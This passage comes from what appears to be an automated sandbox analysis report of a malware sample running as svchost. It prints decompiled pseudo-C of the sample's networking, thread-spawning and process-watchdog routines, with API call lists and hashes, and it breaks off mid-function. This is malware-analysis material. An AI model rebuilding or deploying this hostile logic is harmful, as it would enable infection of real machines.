                                                                                                                                                                                                                                                                      • Instruction ID: 449e92a0b18f183db0f7345c8df75c2f30566562dbb85a03ceabff6c1882a85f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b4986c91a39f45b3505869805ead1539d7754d72571547b31f3d810936fcdc1
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B821F274900299EFEF10CFA4D4447AE7BF1AF04309F108559E8456B281D7B6AA94DB92
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                                                                                      			E04001780() {
                                                                                                                                                                                                                                                                      				char _v404;
                                                                                                                                                                                                                                                                      				signed int _v408;
                                                                                                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v412;
                                                                                                                                                                                                                                                                      				intOrPtr _v416;
                                                                                                                                                                                                                                                                      				intOrPtr _v420;
                                                                                                                                                                                                                                                                      				void* _v424;
                                                                                                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v428;
                                                                                                                                                                                                                                                                      				intOrPtr _v432;
                                                                                                                                                                                                                                                                      				void* _v436;
                                                                                                                                                                                                                                                                      				void* _v440;
                                                                                                                                                                                                                                                                      				void* _v444;
                                                                                                                                                                                                                                                                      				char* _t51;
                                                                                                                                                                                                                                                                      				intOrPtr _t52;
                                                                                                                                                                                                                                                                      				intOrPtr _t54;
                                                                                                                                                                                                                                                                      				intOrPtr _t57;
                                                                                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                                                                                      				void* _t68;
                                                                                                                                                                                                                                                                      				void* _t90;
                                                                                                                                                                                                                                                                      				void* _t91;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t51 =  &_v404;
                                                                                                                                                                                                                                                                      				_push(_t51);
                                                                                                                                                                                                                                                                      				_push(0x202); // executed
                                                                                                                                                                                                                                                                      				L0400100C(); // executed
                                                                                                                                                                                                                                                                      				if(_t51 != 0) {
                                                                                                                                                                                                                                                                      					L16:
                                                                                                                                                                                                                                                                      					ExitProcess(0);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_v408 = 0;
                                                                                                                                                                                                                                                                      				_v412 = 0;
                                                                                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                                                                                      					_t52 = E04001490(); // executed
                                                                                                                                                                                                                                                                      					_v416 = _t52;
                                                                                                                                                                                                                                                                      					if(_v416 > 0 && _v416 < 0x2710) {
                                                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					Sleep(0x7530);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				 *0x4088c2c = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                      				_t54 = E040023E0( *((intOrPtr*)(0x4088c1c + _v408 * 4))); // executed
                                                                                                                                                                                                                                                                      				_t91 = _t90 + 4;
                                                                                                                                                                                                                                                                      				_v420 = _t54;
                                                                                                                                                                                                                                                                      				if(_v420 != 0) {
                                                                                                                                                                                                                                                                      					E04001DC0(_v420, 0x4085600); // executed
                                                                                                                                                                                                                                                                      					_t68 = E04001470(0xc);
                                                                                                                                                                                                                                                                      					_t91 = _t91 + 0xc;
                                                                                                                                                                                                                                                                      					_v440 = _t68;
                                                                                                                                                                                                                                                                      					_v424 = _v440;
                                                                                                                                                                                                                                                                      					 *_v424 =  *(0x4088c1c + _v408 * 4);
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_v424 + 4)) = _v420;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_v424 + 8)) = 0x4085600;
                                                                                                                                                                                                                                                                      					CreateThread(0, 0, E04001630, _v424, 0, 0); // executed
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_v428 = 0;
                                                                                                                                                                                                                                                                      				while(_v428 < 3) {
                                                                                                                                                                                                                                                                      					_t57 = E040023E0( *((intOrPtr*)(0x4088c20 + (_v412 + _v428) * 4))); // executed
                                                                                                                                                                                                                                                                      					_t91 = _t91 + 4;
                                                                                                                                                                                                                                                                      					_v432 = _t57;
                                                                                                                                                                                                                                                                      					if(_v432 != 0) {
                                                                                                                                                                                                                                                                      						E04001DC0(_v432, 0x4085600); // executed
                                                                                                                                                                                                                                                                      						_t62 = E04001470(0xc);
                                                                                                                                                                                                                                                                      						_t91 = _t91 + 0xc;
                                                                                                                                                                                                                                                                      						_v444 = _t62;
                                                                                                                                                                                                                                                                      						_v436 = _v444;
                                                                                                                                                                                                                                                                      						 *_v436 =  *(0x4088c20 + (_v412 + _v428) * 4);
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_v436 + 4)) = _v432;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_v436 + 8)) = 0x4085600;
                                                                                                                                                                                                                                                                      						CreateThread(0, 0, E04001630, _v436, 0, 0); // executed
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_v428 =  &(_v428->nLength);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				WaitForSingleObject( *0x4088c2c, 0xffffffff);
                                                                                                                                                                                                                                                                      				Sleep(0x9c40);
                                                                                                                                                                                                                                                                      				L04001006();
                                                                                                                                                                                                                                                                      				goto L16;
                                                                                                                                                                                                                                                                      			}






















                                                                                                                                                                                                                                                                      0x04001789
                                                                                                                                                                                                                                                                      0x0400178f
                                                                                                                                                                                                                                                                      0x04001790
                                                                                                                                                                                                                                                                      0x04001795
                                                                                                                                                                                                                                                                      0x0400179c
                                                                                                                                                                                                                                                                      0x040019a0
                                                                                                                                                                                                                                                                      0x040019a2
                                                                                                                                                                                                                                                                      0x040019a2
                                                                                                                                                                                                                                                                      0x040017a2
                                                                                                                                                                                                                                                                      0x040017ac
                                                                                                                                                                                                                                                                      0x040017b6
                                                                                                                                                                                                                                                                      0x040017b6
                                                                                                                                                                                                                                                                      0x040017bb
                                                                                                                                                                                                                                                                      0x040017c8
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001990
                                                                                                                                                                                                                                                                      0x04001996
                                                                                                                                                                                                                                                                      0x040017ec
                                                                                                                                                                                                                                                                      0x040017ff
                                                                                                                                                                                                                                                                      0x04001804
                                                                                                                                                                                                                                                                      0x04001807
                                                                                                                                                                                                                                                                      0x04001814
                                                                                                                                                                                                                                                                      0x04001822
                                                                                                                                                                                                                                                                      0x0400182c
                                                                                                                                                                                                                                                                      0x04001831
                                                                                                                                                                                                                                                                      0x04001834
                                                                                                                                                                                                                                                                      0x04001840
                                                                                                                                                                                                                                                                      0x04001859
                                                                                                                                                                                                                                                                      0x04001867
                                                                                                                                                                                                                                                                      0x04001870
                                                                                                                                                                                                                                                                      0x0400188b
                                                                                                                                                                                                                                                                      0x0400188b
                                                                                                                                                                                                                                                                      0x04001891
                                                                                                                                                                                                                                                                      0x040018ac
                                                                                                                                                                                                                                                                      0x040018cd
                                                                                                                                                                                                                                                                      0x040018d2
                                                                                                                                                                                                                                                                      0x040018d5
                                                                                                                                                                                                                                                                      0x040018e2
                                                                                                                                                                                                                                                                      0x040018f4
                                                                                                                                                                                                                                                                      0x040018fe
                                                                                                                                                                                                                                                                      0x04001903
                                                                                                                                                                                                                                                                      0x04001906
                                                                                                                                                                                                                                                                      0x04001912
                                                                                                                                                                                                                                                                      0x04001931
                                                                                                                                                                                                                                                                      0x0400193f
                                                                                                                                                                                                                                                                      0x04001948
                                                                                                                                                                                                                                                                      0x04001963
                                                                                                                                                                                                                                                                      0x04001963
                                                                                                                                                                                                                                                                      0x040018a6
                                                                                                                                                                                                                                                                      0x040018a6
                                                                                                                                                                                                                                                                      0x04001976
                                                                                                                                                                                                                                                                      0x04001981
                                                                                                                                                                                                                                                                      0x0400199b
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 04001795
                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 040019A2
                                                                                                                                                                                                                                                                        • Part of subcall function 04001490: lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                                        • Part of subcall function 04001490: GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                                        • Part of subcall function 04001490: closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040017E6
                                                                                                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 0400188B
                                                                                                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 04001963
                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04001976
                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00009C40), ref: 04001981
                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00007530), ref: 04001990
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Create$SleepThread$CountEventExitObjectProcessSingleStartupTickWaitclosesocketlstrcat
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1305884959-0
                                                                                                                                                                                                                                                                      • Opcode ID: a41e2e6088094ddaf64ef43a59fc0f2982de2e99ed4e0b2c61c148b4799e462e
                                                                                                                                                                                                                                                                      • Instruction ID: 2f7e3e578d268ca83db2a9f917eba75e9ec579b5eb93670916da3db20cf0bcb8
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a41e2e6088094ddaf64ef43a59fc0f2982de2e99ed4e0b2c61c148b4799e462e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14512674A01224AFFB60EF60DC59BDAB7B0AB49708F0480E8E5497B2C0D7756E84CF52
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 93 4001630-400163a 94 4001640-4001662 CoInitialize 93->94 95 400176c-4001771 93->95 96 4001766 94->96 97 4001668 94->97 96->95 98 400166f-4001676 97->98 98->96 99 400167c-400168d WaitForSingleObject 98->99 100 40016a3-40016bd GetExitCodeProcess 99->100 101 400168f-400169e TerminateProcess 99->101 102 4001761 100->102 103 40016c3-40016ca 100->103 101->96 102->98 104 40016dc-40016e3 103->104 105 40016cc-40016d7 Sleep 103->105 106 40016e5-40016f2 SetEvent 104->106 107 40016f6-4001733 CloseHandle Sleep call 40023e0 104->107 105->102 106->96 110 4001735 107->110 111 4001739-4001749 107->111 110->96 111->102 112 400174b-400175e call 4001dc0 111->112 112->102
                                                                                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                                                                                      			E04001630(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                      				intOrPtr* _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				long _v16;
                                                                                                                                                                                                                                                                      				int _v20;
                                                                                                                                                                                                                                                                      				long _v24;
                                                                                                                                                                                                                                                                      				int _t40;
                                                                                                                                                                                                                                                                      				void* _t44;
                                                                                                                                                                                                                                                                      				void* _t67;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				if(_a4 == 0) {
                                                                                                                                                                                                                                                                      					L17:
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				 *0x4003090(0); // executed
                                                                                                                                                                                                                                                                      				_v12 = 0x3e8;
                                                                                                                                                                                                                                                                      				_v16 = 0x1388;
                                                                                                                                                                                                                                                                      				_v8 = _a4;
                                                                                                                                                                                                                                                                      				if( *_v8 == 0) {
                                                                                                                                                                                                                                                                      					L16:
                                                                                                                                                                                                                                                                      					 *0x4003094();
                                                                                                                                                                                                                                                                      					goto L17;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                                                                                      				while(_v20 <= 0x3e8) {
                                                                                                                                                                                                                                                                      					if(WaitForSingleObject( *0x4088c2c, 1) != 0) {
                                                                                                                                                                                                                                                                      						_v24 = 0;
                                                                                                                                                                                                                                                                      						_t40 = GetExitCodeProcess( *(_v8 + 4),  &_v24); // executed
                                                                                                                                                                                                                                                                      						if(_t40 == 0) {
                                                                                                                                                                                                                                                                      							L15:
                                                                                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						if(_v24 != 0x103) {
                                                                                                                                                                                                                                                                      							if(_v24 != 0x17d4a580) {
                                                                                                                                                                                                                                                                      								CloseHandle( *(_v8 + 4));
                                                                                                                                                                                                                                                                      								 *(_v8 + 4) = 0;
                                                                                                                                                                                                                                                                      								Sleep(0xbb8);
                                                                                                                                                                                                                                                                      								_t44 = E040023E0( *_v8);
                                                                                                                                                                                                                                                                      								_t67 = _t67 + 4;
                                                                                                                                                                                                                                                                      								 *(_v8 + 4) = _t44;
                                                                                                                                                                                                                                                                      								if( *(_v8 + 4) != 0) {
                                                                                                                                                                                                                                                                      									_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                      									if( *((intOrPtr*)(_v8 + 8)) != 0) {
                                                                                                                                                                                                                                                                      										E04001DC0( *(_v8 + 4),  *((intOrPtr*)(_v8 + 8)));
                                                                                                                                                                                                                                                                      										_t67 = _t67 + 8;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									goto L15;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								goto L16;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							SetEvent( *0x4088c2c);
                                                                                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                      						goto L15;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					TerminateProcess( *(_v8 + 4), 0);
                                                                                                                                                                                                                                                                      					goto L16;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				goto L16;
                                                                                                                                                                                                                                                                      			}











                                                                                                                                                                                                                                                                      0x0400163a
                                                                                                                                                                                                                                                                      0x0400176c
                                                                                                                                                                                                                                                                      0x04001771
                                                                                                                                                                                                                                                                      0x04001771
                                                                                                                                                                                                                                                                      0x04001642
                                                                                                                                                                                                                                                                      0x04001648
                                                                                                                                                                                                                                                                      0x0400164f
                                                                                                                                                                                                                                                                      0x04001659
                                                                                                                                                                                                                                                                      0x04001662
                                                                                                                                                                                                                                                                      0x04001766
                                                                                                                                                                                                                                                                      0x04001766
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001766
                                                                                                                                                                                                                                                                      0x04001668
                                                                                                                                                                                                                                                                      0x0400166f
                                                                                                                                                                                                                                                                      0x0400168d
                                                                                                                                                                                                                                                                      0x040016a3
                                                                                                                                                                                                                                                                      0x040016b5
                                                                                                                                                                                                                                                                      0x040016bd
                                                                                                                                                                                                                                                                      0x04001761
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001761
                                                                                                                                                                                                                                                                      0x040016ca
                                                                                                                                                                                                                                                                      0x040016e3
                                                                                                                                                                                                                                                                      0x040016fd
                                                                                                                                                                                                                                                                      0x04001706
                                                                                                                                                                                                                                                                      0x04001712
                                                                                                                                                                                                                                                                      0x0400171e
                                                                                                                                                                                                                                                                      0x04001723
                                                                                                                                                                                                                                                                      0x04001729
                                                                                                                                                                                                                                                                      0x04001733
                                                                                                                                                                                                                                                                      0x0400173f
                                                                                                                                                                                                                                                                      0x04001749
                                                                                                                                                                                                                                                                      0x04001759
                                                                                                                                                                                                                                                                      0x0400175e
                                                                                                                                                                                                                                                                      0x0400175e
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001749
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001735
                                                                                                                                                                                                                                                                      0x040016ec
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040016ec
                                                                                                                                                                                                                                                                      0x040016d1
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040016d1
                                                                                                                                                                                                                                                                      0x04001698
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001698
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 04001642
                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000001), ref: 04001685
                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 04001698
                                                                                                                                                                                                                                                                      • GetExitCodeProcess.KERNELBASE(?,00000000), ref: 040016B5
                                                                                                                                                                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 040016D1
                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 040016EC
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 040016FD
                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 04001712
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ProcessSleep$CloseCodeEventExitHandleInitializeObjectSingleTerminateWait
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 110750051-0
                                                                                                                                                                                                                                                                      • Opcode ID: fe07a60cbe0f7ecbb0d01f894f054a993e108e4a151b0fabb885b28606ec9793
                                                                                                                                                                                                                                                                      • Instruction ID: d411829a3222fa01dcd82fa6bcec4b197f6087181c8baad7daf63abf5d028934
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe07a60cbe0f7ecbb0d01f894f054a993e108e4a151b0fabb885b28606ec9793
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9312A74A01204DFEB14DFA4DA98B9DB7B5FB44304F54C598E809BB280D779AE80DB51
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 115 4001160-4001178 socket 116 4001182-40011a9 htons gethostbyname 115->116 117 400117a-400117d 115->117 119 40011ba-40011bd 116->119 120 40011ab-40011d4 116->120 118 4001259-400125c 117->118 119->118 122 40011df-40011e5 120->122 123 4001202-4001208 122->123 124 40011e7-40011f8 connect 122->124 127 4001218-400121c 123->127 128 400120a-4001216 closesocket 123->128 125 4001200 124->125 126 40011fa-40011fe 124->126 125->122 126->123 130 4001256 127->130 131 400121e-4001251 setsockopt * 2 127->131 128->118 130->118 131->130
                                                                                                                                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                                                                                                                                      			E04001160(signed int __eax, intOrPtr _a4, signed short _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                                                                      				signed char _v8;
                                                                                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                                                                                      				signed char _v13;
                                                                                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                                                                                      				short _v34;
                                                                                                                                                                                                                                                                      				char _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				char _v44;
                                                                                                                                                                                                                                                                      				signed int _t40;
                                                                                                                                                                                                                                                                      				char* _t42;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_push(6);
                                                                                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                                                                                      				_push(2); // executed
                                                                                                                                                                                                                                                                      				L0400101E(); // executed
                                                                                                                                                                                                                                                                      				_v20 = __eax;
                                                                                                                                                                                                                                                                      				if(_v20 != 0xffffffff) {
                                                                                                                                                                                                                                                                      					_v36 = 2;
                                                                                                                                                                                                                                                                      					_push(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                                      					L04001030();
                                                                                                                                                                                                                                                                      					_v34 = 2;
                                                                                                                                                                                                                                                                      					_push(_a4); // executed
                                                                                                                                                                                                                                                                      					L04001018(); // executed
                                                                                                                                                                                                                                                                      					_v12 = 2;
                                                                                                                                                                                                                                                                      					if(_v12 == 0) {
                                                                                                                                                                                                                                                                      						return 0xffffffffffffffff;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc))))));
                                                                                                                                                                                                                                                                      					_v8 = 0;
                                                                                                                                                                                                                                                                      					_v13 = 0;
                                                                                                                                                                                                                                                                      					_v40 = 0;
                                                                                                                                                                                                                                                                      					while(_v40 < _a12) {
                                                                                                                                                                                                                                                                      						_push(0x10);
                                                                                                                                                                                                                                                                      						_t42 =  &_v36;
                                                                                                                                                                                                                                                                      						_push(_t42);
                                                                                                                                                                                                                                                                      						_push(_v20); // executed
                                                                                                                                                                                                                                                                      						L04001036(); // executed
                                                                                                                                                                                                                                                                      						if(_t42 != 0) {
                                                                                                                                                                                                                                                                      							_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_v13 = 1;
                                                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if((_v13 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                      						if(_a16 != 0) {
                                                                                                                                                                                                                                                                      							_v44 = _a16;
                                                                                                                                                                                                                                                                      							_push(4);
                                                                                                                                                                                                                                                                      							_push( &_v44);
                                                                                                                                                                                                                                                                      							_push(0x1005);
                                                                                                                                                                                                                                                                      							_push(0xffff);
                                                                                                                                                                                                                                                                      							_push(_v20); // executed
                                                                                                                                                                                                                                                                      							L0400102A(); // executed
                                                                                                                                                                                                                                                                      							_push(4);
                                                                                                                                                                                                                                                                      							_push( &_v44);
                                                                                                                                                                                                                                                                      							_push(0x1006);
                                                                                                                                                                                                                                                                      							_push(0xffff);
                                                                                                                                                                                                                                                                      							_push(_v20); // executed
                                                                                                                                                                                                                                                                      							L0400102A(); // executed
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						return _v20;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t40 = _v20;
                                                                                                                                                                                                                                                                      					_push(_t40); // executed
                                                                                                                                                                                                                                                                      					L04001000(); // executed
                                                                                                                                                                                                                                                                      					return _t40 | 0xffffffff;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _v20;
                                                                                                                                                                                                                                                                      			}














                                                                                                                                                                                                                                                                      0x04001166
                                                                                                                                                                                                                                                                      0x04001168
                                                                                                                                                                                                                                                                      0x0400116a
                                                                                                                                                                                                                                                                      0x0400116c
                                                                                                                                                                                                                                                                      0x04001171
                                                                                                                                                                                                                                                                      0x04001178
                                                                                                                                                                                                                                                                      0x04001187
                                                                                                                                                                                                                                                                      0x0400118f
                                                                                                                                                                                                                                                                      0x04001190
                                                                                                                                                                                                                                                                      0x04001195
                                                                                                                                                                                                                                                                      0x0400119c
                                                                                                                                                                                                                                                                      0x0400119d
                                                                                                                                                                                                                                                                      0x040011a2
                                                                                                                                                                                                                                                                      0x040011a9
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040011ba
                                                                                                                                                                                                                                                                      0x040011b5
                                                                                                                                                                                                                                                                      0x040011c2
                                                                                                                                                                                                                                                                      0x040011c9
                                                                                                                                                                                                                                                                      0x040011cd
                                                                                                                                                                                                                                                                      0x040011df
                                                                                                                                                                                                                                                                      0x040011e7
                                                                                                                                                                                                                                                                      0x040011e9
                                                                                                                                                                                                                                                                      0x040011ec
                                                                                                                                                                                                                                                                      0x040011f0
                                                                                                                                                                                                                                                                      0x040011f1
                                                                                                                                                                                                                                                                      0x040011f8
                                                                                                                                                                                                                                                                      0x040011dc
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040011dc
                                                                                                                                                                                                                                                                      0x040011fa
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040011fa
                                                                                                                                                                                                                                                                      0x04001208
                                                                                                                                                                                                                                                                      0x0400121c
                                                                                                                                                                                                                                                                      0x04001221
                                                                                                                                                                                                                                                                      0x04001224
                                                                                                                                                                                                                                                                      0x04001229
                                                                                                                                                                                                                                                                      0x0400122a
                                                                                                                                                                                                                                                                      0x0400122f
                                                                                                                                                                                                                                                                      0x04001237
                                                                                                                                                                                                                                                                      0x04001238
                                                                                                                                                                                                                                                                      0x0400123d
                                                                                                                                                                                                                                                                      0x04001242
                                                                                                                                                                                                                                                                      0x04001243
                                                                                                                                                                                                                                                                      0x04001248
                                                                                                                                                                                                                                                                      0x04001250
                                                                                                                                                                                                                                                                      0x04001251
                                                                                                                                                                                                                                                                      0x04001251
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001256
                                                                                                                                                                                                                                                                      0x0400120a
                                                                                                                                                                                                                                                                      0x0400120d
                                                                                                                                                                                                                                                                      0x0400120e
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001213
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                                      • htons.WS2_32(?), ref: 04001190
                                                                                                                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 0400119D
                                                                                                                                                                                                                                                                      • connect.WS2_32(000000FF,?,00000010), ref: 040011F1
                                                                                                                                                                                                                                                                      • closesocket.WS2_32(000000FF), ref: 0400120E
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 530611402-0
                                                                                                                                                                                                                                                                      • Opcode ID: 3d9d7dafa64235843ffb934672811fee420f5a57adc05dc76075f4ea8ad417e8
                                                                                                                                                                                                                                                                      • Instruction ID: 08c5e0426ad4df4722dd3bdfc990c85badbf8b170f181f32ce41d694214c1be1
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d9d7dafa64235843ffb934672811fee420f5a57adc05dc76075f4ea8ad417e8
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66315070A00259EBEB14DFA4C845BEEB7B6BF48318F108649E5617F2C0E7B6A9408751
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      C-Code - Quality: 80%
                                                                                                                                                                                                                                                                      			E04001490() {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				char _v524;
                                                                                                                                                                                                                                                                      				intOrPtr _v528;
                                                                                                                                                                                                                                                                      				intOrPtr _v532;
                                                                                                                                                                                                                                                                      				intOrPtr _v536;
                                                                                                                                                                                                                                                                      				signed int _v540;
                                                                                                                                                                                                                                                                      				intOrPtr _v544;
                                                                                                                                                                                                                                                                      				char _v548;
                                                                                                                                                                                                                                                                      				char _v552;
                                                                                                                                                                                                                                                                      				long _v556;
                                                                                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v8 = 0;
